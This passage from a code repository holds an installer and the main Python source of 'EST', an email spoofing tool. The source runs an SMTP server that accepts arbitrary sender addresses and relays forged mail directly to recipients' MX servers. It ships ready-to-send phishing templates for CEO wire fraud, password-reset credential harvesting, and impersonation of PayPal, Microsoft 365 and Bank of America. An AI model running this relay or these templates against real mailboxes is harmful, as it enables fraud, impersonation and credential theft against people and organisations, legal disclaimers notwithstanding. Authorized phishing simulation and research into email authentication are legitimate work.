490 | --subject "Urgent Request" \
491 | --body "Please handle this immediately" \
492 | --target "employee@company.com"
493 | ```
494 |
495 | ### Monitor and Report
496 | ```bash
497 | # View test logs
498 | est logs --lines 50
499 |
500 | # Generate assessment report
501 | est report
502 | ```
503 |
504 | ## Configuration
505 |
506 | - Config file: `~/.est/config.json`
507 | - Log files: `~/.est/est_tests.log`
508 | - Reports: `~/.est/reports/`
509 |
510 | ## Troubleshooting
511 |
512 | If you encounter Python environment issues:
513 |
514 | ### Virtual Environment Issues
515 | ```bash
516 | # Check if virtual environment is active
517 | echo $VIRTUAL_ENV
518 |
519 | # Manually activate if needed
520 | source ~/.est-env/bin/activate
521 |
522 | # Reinstall if corrupted
523 | rm -rf ~/.est-env
524 | ./install.sh
525 | ```
526 |
527 | ### System Python Issues
528 | ```bash
529 | # Install missing dependencies
530 | sudo apt install python3-dnspython
531 |
532 | # Use system override if needed
533 | pip3 install --user --break-system-packages dnspython
534 | ```
535 |
536 | ## Support
537 |
538 | - Documentation: /opt/est/docs/
539 | - Examples: /opt/est/examples/
540 | - Issues: https://github.com/your-org/EST/issues
541 | EOF
542 |
543 | # Create troubleshooting guide
544 | cat > "$DOC_DIR/TROUBLESHOOTING.md" << 'EOF'
545 | # EST Troubleshooting Guide
546 |
547 | ## Python Environment Issues
548 |
549 | ### Virtual Environment Not Found
550 | **Problem**: EST can't find virtual environment
551 | **Solution**:
552 | ```bash
553 | # Reinstall EST
554 | ./install.sh
555 |
556 | # Or manually recreate
557 | python3 -m venv ~/.est-env
558 | source ~/.est-env/bin/activate
559 | pip install dnspython
560 | ```
561 |
562 | ### Externally Managed Environment Error
563 | **Problem**: pip install fails with "externally-managed-environment"
564 | **Solution**:
565 | ```bash
566 | # Option 1: Use virtual environment (recommended)
567 | python3 -m venv ~/.est-env
568 | source ~/.est-env/bin/activate
569 | pip install dnspython
570 |
571 | # Option 2: Use system packages
572 | sudo apt install python3-dnspython
573 |
574 | # Option 3: Override (use with caution)
575 | pip3 install --user --break-system-packages dnspython
576 | ```
577 |
578 | ## Common Issues
579 |
580 | ### Port Permission Denied
581 | **Problem**: Cannot bind to port 25
582 | **Solution**:
583 | ```bash
584 | # Use unprivileged port
585 | est server --port 2525
586 |
587 | # OR run as root for port 25
588 | sudo est server --port 25
589 | ```
590 |
591 | ### DNS Resolution Failures
592 | **Problem**: Cannot resolve MX records
593 | **Solution**:
594 | ```bash
595 | # Install DNS library
596 | sudo apt install python3-dnspython
597 |
598 | # Verify DNS functionality
599 | dig MX example.com
600 | ```
601 |
602 | ### Email Delivery Failures
603 | **Problem**: Emails not reaching targets
604 | **Solution**:
605 | 1. Check SMTP server logs: `est logs`
606 | 2. Verify target domain: `dig MX target-domain.com`
607 | 3. Test with temporary email: `est test 1 test@guerrillamail.com`
608 |
609 | ### Command Not Found
610 | **Problem**: `est` command not available
611 | **Solution**:
612 | ```bash
613 | # Reinstall tool
614 | ./install.sh
615 |
616 | # Or run directly
617 | python3 /opt/est/bin/est.py --help
618 |
619 | # Check if virtual environment is needed
620 | source ~/.est-env/bin/activate
621 | est --help
622 | ```
623 |
624 | ### Module Import Errors
625 | **Problem**: Missing Python modules
626 | **Solution**:
627 | ```bash
628 | # For virtual environment
629 | source ~/.est-env/bin/activate
630 | pip install dnspython
631 |
632 | # For system installation
633 | sudo apt install python3-dnspython
634 |
635 | # Check Python path
636 | python3 -c "import dns.resolver; print('DNS module working')"
637 | ```
638 |
639 | ## Kali Linux Specific
640 |
641 | ### Python 3.13+ Issues
642 | Kali Linux uses Python 3.13+ which has stricter package management:
643 |
644 | ```bash
645 | # Always use virtual environment on Kali
646 | python3 -m venv ~/.est-env
647 | source ~/.est-env/bin/activate
648 | pip install dnspython
649 |
650 | # Or use system packages
651 | sudo apt install python3-dnspython
652 | ```
653 |
654 | ### Network Interface Issues
655 | ```bash
656 | # Bind to specific interface
657 | est server --host 192.168.1.100 --port 2525
658 |
659 | # Check network interfaces
660 | ip addr show
661 | ```
662 | EOF
663 |
664 | print_status "Documentation created"
665 | }
666 |
667 | # Install bash completion
668 | install_bash_completion() {
669 | print_step "Installing bash completion..."
670 |
671 | COMPLETION_DIR="/etc/bash_completion.d"
672 | COMPLETION_FILE="$COMPLETION_DIR/est"
673 |
674 | if [ -d "$COMPLETION_DIR" ]; then
675 | cat > "/tmp/est_completion" << 'EOF'
676 | # EST bash completion
677 | _est_completion() {
678 | local cur prev commands
679 | COMPREPLY=()
680 | cur="${COMP_WORDS[COMP_CWORD]}"
681 | prev="${COMP_WORDS[COMP_CWORD-1]}"
682 | commands="server list test custom logs report"
683 |
684 | case ${prev} in
685 | est)
686 | COMPREPLY=( $(compgen -W "${commands}" -- ${cur}) )
687 | return 0
688 | ;;
689 | server)
690 | COMPREPLY=( $(compgen -W "--host --port" -- ${cur}) )
691 | return 0
692 | ;;
693 | test)
694 | COMPREPLY=( $(compgen -W "1 2 3 4 5" -- ${cur}) )
695 | return 0
696 | ;;
697 | logs)
698 | COMPREPLY=( $(compgen -W "--lines" -- ${cur}) )
699 | return 0
700 | ;;
701 | report)
702 | COMPREPLY=( $(compgen -W "--output" -- ${cur}) )
703 | return 0
704 | ;;
705 | custom)
706 | COMPREPLY=( $(compgen -W "--from-email --from-name --subject --body --target" -- ${cur}) )
707 | return 0
708 | ;;
709 | esac
710 | }
711 |
712 | complete -F _est_completion est
713 | EOF
714 |
715 | if sudo mv "/tmp/est_completion" "$COMPLETION_FILE" 2>/dev/null; then
716 | print_status "Bash completion installed"
717 | else
718 | print_warning "Could not install bash completion (permissions)"
719 | fi
720 | else
721 | print_warning "Bash completion directory not found, skipping"
722 | fi
723 | }
724 |
725 | # Verify installation
726 | verify_installation() {
727 | print_step "Verifying installation..."
728 |
729 | # Check if command is available
730 | if command -v est &> /dev/null; then
731 | print_status "EST command available system-wide"
732 | else
733 | print_error "EST command not found in PATH"
734 | return 1
735 | fi
736 |
737 | # Check if help works
738 | if est --help &> /dev/null; then
739 | print_status "EST help command functional"
740 | else
741 | print_error "EST help command failed"
742 | return 1
743 | fi
744 |
745 | # Check configuration directory
746 | if [ -d "$HOME/.est" ]; then
747 | print_status "User configuration directory exists"
748 | else
749 | print_error "User configuration directory missing"
750 | return 1
751 | fi
752 |
753 | # Check virtual environment if used
754 | if [ "$USE_VENV" = true ]; then
755 | if [ -d "$VENV_DIR" ]; then
756 | print_status "Virtual environment exists at $VENV_DIR"
757 | else
758 | print_error "Virtual environment missing"
759 | return 1
760 | fi
761 | fi
762 |
763 | # Test basic functionality
764 | if est list &> /dev/null; then
765 | print_status "EST basic functionality working"
766 | else
767 | print_warning "EST basic test failed (may work anyway)"
768 | fi
769 |
770 | print_status "Installation verification completed successfully"
771 | }
772 |
773 | # Display post-installation information
774 | show_post_install_info() {
775 | echo
776 | echo -e "${GREEN}╔══════════════════════════════════════════════════════════════╗${NC}"
777 | echo -e "${GREEN}║ INSTALLATION COMPLETE! ║${NC}"
778 | echo -e "${GREEN}╚══════════════════════════════════════════════════════════════╝${NC}"
779 | echo
780 | echo -e "${CYAN}🚀 EST v${TOOL_VERSION} successfully installed!${NC}"
781 | echo
782 | echo -e "${BLUE}📍 Installation Details:${NC}"
783 | echo -e " 📂 Installation Directory: ${INSTALL_DIR}"
784 | echo -e " 🔗 System Command: ${BIN_LINK}"
785 | echo -e " ⚙️ User Config: ~/.est/"
786 | echo -e " 📚 Documentation: ${INSTALL_DIR}/docs/"
787 | if [ "$USE_VENV" = true ]; then
788 | echo -e " 🐍 Python Environment: Virtual environment at $VENV_DIR"
789 | else
790 | echo -e " 🐍 Python Environment: System Python"
791 | fi
792 | echo
793 | echo -e "${BLUE}🎯 Quick Start Commands:${NC}"
794 | echo -e "${YELLOW} est server --port 2525${NC} # Start SMTP server"
795 | echo -e "${YELLOW} est list${NC} # List attack scenarios"
796 | echo -e "${YELLOW} est test 1 target@email.com${NC} # Run CEO fraud test"
797 | echo -e "${YELLOW} est logs${NC} # View test logs"
798 | echo -e "${YELLOW} est --help${NC} # Show all options"
799 | echo
800 | echo -e "${BLUE}📖 Getting Started:${NC}"
801 | echo -e " 1. Start EST server: ${YELLOW}est server --port 2525${NC}"
802 | echo -e " 2. Get temp email from: ${YELLOW}https://guerrillamail.com${NC}"
803 | echo -e " 3. Run first test: ${YELLOW}est test 1 your-temp-email@guerrillamail.com${NC}"
804 | echo -e " 4. Check results: ${YELLOW}est logs${NC}"
805 | echo
806 | echo -e "${BLUE}📚 Documentation:${NC}"
807 | echo -e " • Quick Start: ${INSTALL_DIR}/docs/QUICKSTART.md"
808 | echo -e " • Troubleshooting: ${INSTALL_DIR}/docs/TROUBLESHOOTING.md"
809 | echo -e " • Full README: ${INSTALL_DIR}/docs/README.md"
810 | echo
811 | if [ "$USE_VENV" = true ]; then
812 | echo -e "${BLUE}🐍 Python Environment:${NC}"
813 | echo -e " • Virtual environment: ${VENV_DIR}"
814 | echo -e " • Isolated from system Python"
815 | echo -e " • Compatible with Python 3.13+"
816 | echo
817 | fi
818 | echo -e "${RED}⚠️ IMPORTANT LEGAL REMINDER:${NC}"
819 | echo -e "${RED} EST is for authorized security testing and education only!${NC}"
820 | echo -e "${RED} Always obtain explicit written permission before testing.${NC}"
821 | echo
822 | echo -e "${PURPLE}💡 Need help? Run: ${YELLOW}est --help${NC} ${PURPLE}or check the documentation${NC}"
823 | echo
824 | }
825 |
826 | # Cleanup function
827 | cleanup() {
828 | print_info "Cleaning up temporary files..."
829 | rm -f /tmp/est_*
830 |
831 | # Deactivate virtual environment if active
832 | if [ "$VIRTUAL_ENV" != "" ]; then
833 | deactivate 2>/dev/null || true
834 | fi
835 | }
836 |
837 | # Signal handlers
838 | trap cleanup EXIT
839 |
840 | # Main installation process
841 | main() {
842 | print_banner
843 |
844 | echo -e "${YELLOW}⚠️ This will install EST (Email Spoofing Tool) system-wide${NC}"
845 | echo -e "${YELLOW} Installation directory: ${INSTALL_DIR}${NC}"
846 | echo -e "${YELLOW} System command: ${BIN_LINK}${NC}"
847 | if command -v python3 &> /dev/null; then
848 | PYTHON_VERSION=$(python3 -c "import sys; print(f'{sys.version_info.major}.{sys.version_info.minor}')")
849 | if [[ "$PYTHON_VERSION" > "3.12" ]]; then
850 | echo -e "${YELLOW} Python $PYTHON_VERSION detected - will use virtual environment${NC}"
851 | fi
852 | fi
853 | echo
854 | read -p "Continue with installation? (y/N): " -n 1 -r
855 | echo
856 |
857 | if [[ ! $REPLY =~ ^[Yy]$ ]]; then
858 | print_info "Installation cancelled by user"
859 | exit 0
860 | fi
861 |
862 | echo
863 | print_info "Starting EST installation process..."
864 | echo
865 |
866 | # Run installation steps
867 | check_root
868 | check_system
869 | echo
870 |
871 | install_dependencies
872 | echo
873 |
874 | setup_python_environment
875 | echo
876 |
877 | setup_directories
878 | echo
879 |
880 | install_tool
881 | echo
882 |
883 | create_desktop_entry
884 | echo
885 |
886 | create_documentation
887 | echo
888 |
889 | install_bash_completion
890 | echo
891 |
892 | if verify_installation; then
893 | echo
894 | show_post_install_info
895 | else
896 | print_error "Installation verification failed"
897 | echo "Please check the error messages above and retry installation"
898 | exit 1
899 | fi
900 | }
901 |
902 | # Check if required files exist
903 | if [ ! -f "est.py" ]; then
904 | print_error "Required file 'est.py' not found in current directory"
905 | echo
906 | echo "Please ensure you have the following EST files:"
907 | echo " • est.py (main application)"
908 | echo " • install.sh (this installer)"
909 | echo " • README.md (documentation)"
910 | echo " • requirements.txt (dependencies)"
911 | echo
912 | echo "Download from: https://github.com/techsky-eh/EST"
913 | exit 1
914 | fi
915 |
916 | # Execute main installation
917 | main "$@"
--------------------------------------------------------------------------------
/est.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | """
3 | EST - Email Spoofing Tool
4 | Professional Email Security Assessment Framework
5 |
6 | Author: Security Research Team
7 | Version: 2.0.1
8 | License: MIT
9 | Repository: https://github.com/your-org/EST
10 |
11 | LEGAL NOTICE:
12 | This tool is designed for authorized security testing, penetration testing,
13 | and educational purposes only. Users must obtain explicit written permission
14 | before testing any systems they do not own. Unauthorized use of this tool
15 | may violate local, state, and federal laws.
16 |
17 | The developers assume no liability and are not responsible for any misuse
18 | or damage caused by this program.
19 | """
20 |
21 | import sys
22 | import os
23 | import json
24 | import argparse
25 | import socket
26 | import threading
27 | import smtplib
28 | import time
29 | import subprocess
30 | import signal
31 | from datetime import datetime
32 | from pathlib import Path
33 | from typing import Dict, List, Optional, Tuple
34 | import logging
35 | from dataclasses import dataclass
36 | import re
37 | from email.mime.text import MIMEText
38 | from email.mime.multipart import MIMEMultipart
39 | from email.header import Header
40 | from email.utils import formatdate
41 | import email.utils
42 |
43 | # Version and metadata
44 | __version__ = "2.0.1"
45 | __author__ = "Tech Sky - SRT"
46 | __license__ = "MIT"
47 | __description__ = "Professional Email Security Assessment Framework"
48 |
49 | @dataclass
50 | class EmailScenario:
51 | """Data class for email spoofing scenarios"""
52 | name: str
53 | category: str
54 | from_email: str
55 | from_name: str
56 | subject: str
57 | body: str
58 | description: str
59 | severity: str
60 |
61 | @dataclass
62 | class TestResult:
63 | """Data class for test results"""
64 | timestamp: str
65 | test_type: str
66 | scenario: str
67 | target: str
68 | from_email: str
69 | success: bool
70 | details: Dict
71 |
72 | class ESTConfig:
73 | """Configuration manager for EST"""
74 |
75 | def __init__(self):
76 | self.config_dir = Path.home() / ".est"
77 | self.config_file = self.config_dir / "config.json"
78 | self.log_file = self.config_dir / "est_tests.log"
79 | self.reports_dir = self.config_dir / "reports"
80 |
81 | # Create directories
82 | self.config_dir.mkdir(exist_ok=True)
83 | self.reports_dir.mkdir(exist_ok=True)
84 |
85 | # Load configuration
86 | self.config = self._load_config()
87 |
88 | # Setup logging
89 | self._setup_logging()
90 |
91 | def _load_config(self) -> Dict:
92 | """Load configuration from file"""
93 | default_config = {
94 | "version": __version__,
95 | "smtp_server": {
96 | "host": "0.0.0.0",
97 | "port": 2525,
98 | "timeout": 30
99 | },
100 | "scenarios": [
101 | {
102 | "name": "CEO Fraud - Urgent Wire Transfer",
103 | "category": "Business Email Compromise",
104 | "from_email": "ceo@targetcompany.com",
105 | "from_name": "John Smith, CEO",
106 | "subject": "URGENT: Wire Transfer Authorization Required",
107 | "body": "I need you to process an urgent wire transfer for $85,000 to our new vendor immediately. This is time-sensitive and confidential. Please handle this discreetly and confirm once completed.\n\nAmount: $85,000\nAccount details will be provided separately.\n\nRegards,\nJohn Smith\nChief Executive Officer",
108 | "description": "CEO impersonation requesting urgent financial transaction",
109 | "severity": "Critical"
110 | },
111 | {
112 | "name": "IT Helpdesk - Password Reset",
113 | "category": "Technical Support Fraud",
114 | "from_email": "helpdesk@targetcompany.com",
115 | "from_name": "IT Support Team",
116 | "subject": "Action Required: Password Reset Verification",
117 | "body": "Dear User,\n\nWe have detected suspicious activity on your account. For security purposes, you must verify your current password within 24 hours to prevent account suspension.\n\nClick here to verify: [VERIFICATION LINK]\n\nFailure to verify will result in immediate account lockout.\n\nIT Support Team\nDo not reply to this email.",
118 | "description": "IT support impersonation for credential harvesting",
119 | "severity": "High"
120 | },
121 | {
122 | "name": "PayPal Security Alert",
123 | "category": "Financial Services Phishing",
124 | "from_email": "security@paypal.com",
125 | "from_name": "PayPal Security Team",
126 | "subject": "Security Alert: Unusual Account Activity Detected",
127 | "body": "We've detected unusual activity on your PayPal account:\n\n• Login from new device (IP: 192.168.1.100)\n• Attempted transaction: $1,247.99\n• Location: Unknown\n\nYour account has been temporarily limited for your protection.\n\nVerify your account immediately: [SECURE LINK]\n\nIf you don't recognize this activity, please contact us immediately.\n\nPayPal Security Team\nThis is an automated message.",
128 | "description": "PayPal impersonation for account compromise",
129 | "severity": "High"
130 | },
131 | {
132 | "name": "Microsoft 365 License Expiration",
133 | "category": "Software/License Fraud",
134 | "from_email": "noreply@microsoft.com",
135 | "from_name": "Microsoft 365 Admin",
136 | "subject": "ACTION REQUIRED: Your Microsoft 365 License Expires Today",
137 | "body": "Your Microsoft 365 Business license expires today at 11:59 PM.\n\nImmediate action required to prevent:\n✗ Loss of email access\n✗ File synchronization stoppage\n✗ Team collaboration disruption\n\nRenew immediately to maintain access:\n[RENEWAL LINK]\n\nYour license key: M365-BIZ-2024-XXXX\n\nMicrosoft 365 Administration\nThis is an automated renewal notice.",
138 | "description": "Microsoft service impersonation for credential theft",
139 | "severity": "Medium"
140 | },
141 | {
142 | "name": "Bank Account Verification",
143 | "category": "Financial Institution Fraud",
144 | "from_email": "security@bankofamerica.com",
145 | "from_name": "Bank of America Security",
146 | "subject": "Immediate Verification Required - Account Suspension Notice",
147 | "body": "IMPORTANT SECURITY NOTICE\n\nWe have temporarily suspended your account due to suspicious activity:\n\n• Multiple failed login attempts\n• Unrecognized device access\n• Potential unauthorized transactions\n\nAccount Status: SUSPENDED\nSuspension Date: [TODAY]\nReference: SEC-2024-[RANDOM]\n\nVerify your identity immediately to restore access:\n[VERIFICATION PORTAL]\n\nFailure to verify within 48 hours will result in permanent closure.\n\nBank of America Security Department",
148 | "description": "Banking institution impersonation for credential harvesting",
149 | "severity": "Critical"
150 | }
151 | ],
152 | "temp_email_services": [
153 | "guerrillamail.com",
154 | "sharklasers.com",
155 | "mailinator.com",
156 | "10minutemail.com",
157 | "tempmail.org",
158 | "yopmail.com"
159 | ],
160 | "reporting": {
161 | "auto_generate": True,
162 | "format": "json",
163 | "include_screenshots": False
164 | }
165 | }
166 |
167 | if self.config_file.exists():
168 | try:
169 | with open(self.config_file, 'r') as f:
170 | loaded_config = json.load(f)
171 | # Merge with defaults to ensure all keys exist
172 | for key in default_config:
173 | if key not in loaded_config:
174 | loaded_config[key] = default_config[key]
175 | return loaded_config
176 | except Exception as e:
177 | print(f"⚠️ Error loading config: {e}")
178 | return default_config
179 | else:
180 | self._save_config(default_config)
181 | return default_config
182 |
183 | def _save_config(self, config: Dict):
184 | """Save configuration to file"""
185 | try:
186 | with open(self.config_file, 'w') as f:
187 | json.dump(config, f, indent=2)
188 | except Exception as e:
189 | print(f"⚠️ Error saving config: {e}")
190 |
191 | def _setup_logging(self):
192 | """Setup logging configuration"""
193 | logging.basicConfig(
194 | level=logging.INFO,
195 | format='%(asctime)s - %(levelname)s - %(message)s',
196 | handlers=[
197 | logging.FileHandler(self.log_file),
198 | logging.StreamHandler(sys.stdout)
199 | ]
200 | )
201 | self.logger = logging.getLogger('EST')
202 |
203 | class SMTPTestServer:
204 | """Professional SMTP server for security testing"""
205 |
206 | def __init__(self, host: str, port: int, config: ESTConfig):
207 | self.host = host
208 | self.port = port
209 | self.config = config
210 | self.running = False
211 | self.connections = 0
212 | self.emails_processed = 0
213 |
214 | def start(self):
215 | """Start the SMTP testing server"""
216 | try:
217 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
218 | self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
219 | self.sock.bind((self.host, self.port))
220 | self.sock.listen(10)
221 | self.running = True
222 |
223 | print(f"""
224 | ╔══════════════════════════════════════════════════════════════╗
225 | ║ EST SMTP SERVER v{__version__} ║
226 | ║ Email Spoofing Tool - Server Mode ║
227 | ╚══════════════════════════════════════════════════════════════╝
228 |
229 | 🚀 Server Status: ACTIVE
230 | 📡 Listening on: {self.host}:{self.port}
231 | 📁 Log file: {self.config.log_file}
232 | 📊 Statistics: {self.connections} connections, {self.emails_processed} emails processed
233 |
234 | ⚡ Server Features:
235 | • Multi-threaded connection handling
236 | • Automatic MX record resolution
237 | • Real-time email relay to destinations
238 | • Comprehensive audit logging
239 | • Professional SMTP protocol compliance
240 |
241 | 🎯 Quick Test Commands:
242 | telnet {self.host} {self.port}
243 | est test 1 target@example.com
244 |
245 | 🛑 Press Ctrl+C to stop server
246 | """)
247 |
248 | # Handle Ctrl+C gracefully
249 | signal.signal(signal.SIGINT, self._signal_handler)
250 |
251 | while self.running:
252 | try:
253 | client_sock, addr = self.sock.accept()
254 | self.connections += 1
255 | thread = threading.Thread(
256 | target=self._handle_client,
257 | args=(client_sock, addr),
258 | name=f"SMTP-Client-{self.connections}"
259 | )
260 | thread.daemon = True
261 | thread.start()
262 | except Exception as e:
263 | if self.running:
264 | self.config.logger.error(f"Accept error: {e}")
265 |
266 | except Exception as e:
267 | print(f"❌ Server startup failed: {e}")
268 | if self.port <= 1024:
269 | print("💡 Try using a higher port number (e.g., --port 2525)")
270 | finally:
271 | if hasattr(self, 'sock'):
272 | self.sock.close()
273 |
274 | def _signal_handler(self, signum, frame):
275 | """Handle shutdown signals"""
276 | print(f"\n\n🛑 Shutting down EST SMTP Server...")
277 | print(f"📊 Final Statistics:")
278 | print(f" • Connections handled: {self.connections}")
279 | print(f" • Emails processed: {self.emails_processed}")
280 | print(f" • Log file: {self.config.log_file}")
281 | self.running = False
282 | sys.exit(0)
283 |
284 | def _handle_client(self, client_sock, addr):
285 | """Handle individual SMTP client connections"""
286 | client_id = f"{addr[0]}:{addr[1]}"
287 |
288 | try:
289 | self.config.logger.info(f"New SMTP connection from {client_id}")
290 |
291 | # SMTP session state
292 | mail_from = ""
293 | rcpt_to = []
294 |
295 | # Send greeting
296 | client_sock.send(f"220 EST-SMTP-{__version__} Security Testing Server Ready\r\n".encode())
297 |
298 | while self.running:
299 | try:
300 | data = client_sock.recv(4096).decode('utf-8', errors='ignore').strip()
301 | if not data:
302 | break
303 |
304 | # Log command
305 | self.config.logger.debug(f"[{client_id}] Command: {data}")
306 |
307 | cmd = data.upper()
308 |
309 | if cmd.startswith("EHLO") or cmd.startswith("HELO"):
310 | response = f"250-EST-SMTP Hello {addr[0]}\r\n250 HELP\r\n"
311 | client_sock.send(response.encode())
312 |
313 | elif cmd.startswith("MAIL FROM:"):
314 | mail_from = self._extract_email(data)
315 | self.config.logger.info(f"[{client_id}] Spoofed sender: {mail_from}")
316 | client_sock.send(b"250 OK\r\n")
317 |
318 | elif cmd.startswith("RCPT TO:"):
319 | rcpt = self._extract_email(data)
320 | rcpt_to.append(rcpt)
321 | self.config.logger.info(f"[{client_id}] Target: {rcpt}")
322 | client_sock.send(b"250 OK\r\n")
323 |
324 | elif cmd == "DATA":
325 | client_sock.send(b"354 End data with .\r\n")
326 |
327 | # Receive email data
328 | email_data = ""
329 | while True:
330 | line = client_sock.recv(4096).decode('utf-8', errors='ignore')
331 | email_data += line
332 | if line.endswith('\r\n.\r\n'):
333 | break
334 |
335 | # Process email
336 | success = self._process_email(mail_from, rcpt_to, email_data[:-5], client_id)
337 | self.emails_processed += 1
338 |
339 | if success:
340 | client_sock.send(b"250 OK Message queued for delivery\r\n")
341 | else:
342 | client_sock.send(b"550 Message delivery failed\r\n")
343 |
344 | # Reset session
345 | mail_from = ""
346 | rcpt_to = []
347 |
348 | elif cmd == "QUIT":
349 | client_sock.send(b"221 EST-SMTP closing connection\r\n")
350 | break
351 |
352 | elif cmd.startswith("RSET"):
353 | mail_from = ""
354 | rcpt_to = []
355 | client_sock.send(b"250 OK\r\n")
356 |
357 | else:
358 | client_sock.send(b"500 Command not recognized\r\n")
359 |
360 | except socket.timeout:
361 | break
362 | except Exception as e:
363 | self.config.logger.error(f"[{client_id}] Command processing error: {e}")
364 | break
365 |
366 | except Exception as e:
367 | self.config.logger.error(f"[{client_id}] Connection error: {e}")
368 | finally:
369 | client_sock.close()
370 | self.config.logger.info(f"[{client_id}] Connection closed")
371 |
372 | def _extract_email(self, smtp_line: str) -> str:
373 | """Extract email address from SMTP command"""
374 | match = re.search(r'<(.+?)>', smtp_line)
375 | if match:
376 | return match.group(1)
377 | parts = smtp_line.split()
378 | return parts[-1].strip('<>') if len(parts) > 1 else ""
379 |
380 | def _process_email(self, mail_from: str, rcpt_to: List[str], email_data: str, client_id: str) -> bool:
381 | """Process and relay spoofed email"""
382 | self.config.logger.info(f"[{client_id}] Processing spoofed email from {mail_from} to {rcpt_to}")
383 |
384 | success_count = 0
385 | for rcpt in rcpt_to:
386 | if self._relay_email(mail_from, rcpt, email_data):
387 | success_count += 1
388 |
389 | # Log test result
390 | result = TestResult(
391 | timestamp=datetime.now().isoformat(),
392 | test_type="smtp_relay",
393 | scenario="server_relay",
394 | target=", ".join(rcpt_to),
395 | from_email=mail_from,
396 | success=success_count > 0,
397 | details={
398 | "client_id": client_id,
399 | "total_targets": len(rcpt_to),
400 | "successful_deliveries": success_count,
401 | "email_size": len(email_data)
402 | }
403 | )
404 |
405 | self._log_test_result(result)
406 |
407 | return success_count > 0
408 |
409 | def _relay_email(self, mail_from: str, rcpt_to: str, email_data: str) -> bool:
410 | """Relay email to destination"""
411 | try:
412 | domain = rcpt_to.split('@')[1]
413 | mx_servers = self._get_mx_servers(domain)
414 |
415 | self.config.logger.info(f"Attempting relay to {rcpt_to} via {len(mx_servers)} MX servers")
416 |
417 | for mx_server in mx_servers:
418 | try:
419 | server = smtplib.SMTP(mx_server, 25, timeout=15)
420 | server.set_debuglevel(0)
421 |
422 | # Ensure proper encoding
423 | full_email = f"From: {mail_from}\r\nTo: {rcpt_to}\r\n{email_data}"
424 | full_email_bytes = full_email.encode('utf-8')
425 | server.sendmail(mail_from, [rcpt_to], full_email_bytes)
426 | server.quit()
427 |
428 | self.config.logger.info(f"✅ Email delivered to {rcpt_to} via {mx_server}")
429 | return True
430 |
431 | except Exception as e:
432 | self.config.logger.warning(f"❌ Relay failed via {mx_server}: {str(e)[:60]}...")
433 | continue
434 |
435 | self.config.logger.error(f"❌ All relay attempts failed for {rcpt_to}")
436 | return False
437 |
438 | except Exception as e:
439 | self.config.logger.error(f"❌ Relay error for {rcpt_to}: {e}")
440 | return False
441 |
442 | def _get_mx_servers(self, domain: str) -> List[str]:
443 | """Get MX servers for domain"""
444 | try:
445 | import dns.resolver
446 | mx_records = dns.resolver.resolve(domain, 'MX')
447 | servers = [str(mx.exchange).rstrip('.') for mx in sorted(mx_records, key=lambda x: x.preference)]
448 | self.config.logger.debug(f"Found MX servers for {domain}: {servers}")
449 | return servers
450 | except ImportError:
451 | self.config.logger.warning("DNS library not available, using fallbacks")
452 | except Exception as e:
453 | self.config.logger.warning(f"DNS lookup failed for {domain}: {e}")
454 |
455 | # Fallback servers
456 | fallbacks = [f"mail.{domain}", f"mx.{domain}", f"mx1.{domain}"]
457 | working_fallbacks = []
458 |
459 | for mx in fallbacks:
460 | try:
461 | socket.gethostbyname(mx)
462 | working_fallbacks.append(mx)
463 | except:
464 | continue
465 |
466 | return working_fallbacks
467 |
468 | def _log_test_result(self, result: TestResult):
469 | """Log test result to file"""
470 | try:
471 | log_entry = {
472 | "timestamp": result.timestamp,
473 | "test_type": result.test_type,
474 | "scenario": result.scenario,
475 | "target": result.target,
476 | "from_email": result.from_email,
477 | "success": result.success,
478 | "details": result.details
479 | }
480 |
481 | with open(self.config.log_file, 'a') as f:
482 | f.write(json.dumps(log_entry) + '\n')
483 |
484 | except Exception as e:
485 | self.config.logger.error(f"Failed to log test result: {e}")
486 |
487 | class EST:
488 | """Main EST application class"""
489 |
490 | def __init__(self):
491 | self.config = ESTConfig()
492 | self.scenarios = [EmailScenario(**s) for s in self.config.config['scenarios']]
493 |
494 | def print_banner(self):
495 | """Print professional banner"""
496 | banner = f"""
497 | ╔══════════════════════════════════════════════════════════════╗
498 | ║ EST - Email Spoofing Tool ║
499 | ║ Professional Security Assessment v{__version__} ║
500 | ║ ║
501 | ║ Advanced Email Security Testing Framework ║
502 | ║ For Authorized Penetration Testing Only ║
503 | ║ Educational & Research Purposes ║
504 | ║ ║
505 | ║ Author: {__author__} ║
506 | ║ License: {__license__} ║
507 | ╚══════════════════════════════════════════════════════════════╝
508 |
509 | ⚠️ LEGAL NOTICE: This tool is for authorized security testing only.
510 | Obtain explicit written permission before testing any systems.
511 | Unauthorized use may violate applicable laws and regulations.
512 | """
513 | print(banner)
514 |
515 | def list_scenarios(self):
516 | """List all available test scenarios"""
517 | print("\n📋 Available Email Spoofing Scenarios:\n")
518 |
519 | categories = {}
520 | for i, scenario in enumerate(self.scenarios, 1):
521 | if scenario.category not in categories:
522 | categories[scenario.category] = []
523 | categories[scenario.category].append((i, scenario))
524 |
525 | for category, scenarios in categories.items():
526 | print(f"🏷️ {category}")
527 | print("─" * (len(category) + 5))
528 |
529 | for idx, scenario in scenarios:
530 | severity_icon = {
531 | "Critical": "🔴",
532 | "High": "🟠",
533 | "Medium": "🟡",
534 | "Low": "🟢"
535 | }.get(scenario.severity, "⚪")
536 |
537 | print(f" {idx:2d}. {scenario.name} {severity_icon}")
538 | print(f" From: {scenario.from_name} <{scenario.from_email}>")
539 | print(f" Subject: {scenario.subject}")
540 | print(f" Description: {scenario.description}")
541 | print()
542 |
543 | print(f"📊 Total scenarios: {len(self.scenarios)}")
544 | print(f"🎯 Use 'est test ' to run a scenario")
545 |
546 | def run_scenario(self, scenario_id: int, target: str, smtp_host: str = "localhost", smtp_port: int = 2525) -> bool:
547 | """Run a specific spoofing scenario"""
548 | try:
549 | scenario = self.scenarios[scenario_id - 1]
550 | except IndexError:
551 | print(f"❌ Invalid scenario ID: {scenario_id}")
552 | print(f"💡 Available scenarios: 1-{len(self.scenarios)}")
553 | return False
554 |
555 | print(f"\n🎯 Executing Email Spoofing Test")
556 | print(f"─" * 40)
557 | print(f"📧 Scenario: {scenario.name}")
558 | print(f"🏷️ Category: {scenario.category}")
559 | print(f"⚠️ Severity: {scenario.severity}")
560 | print(f"📤 Spoofed From: {scenario.from_name} <{scenario.from_email}>")
561 | print(f"📥 Target: {target}")
562 | print(f"📡 SMTP Server: {smtp_host}:{smtp_port}")
563 | print(f"🕐 Timestamp: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
564 | print()
565 |
566 | try:
567 | # Create professional email content using MIME
568 | email_content = self._create_mime_email(scenario, target)
569 |
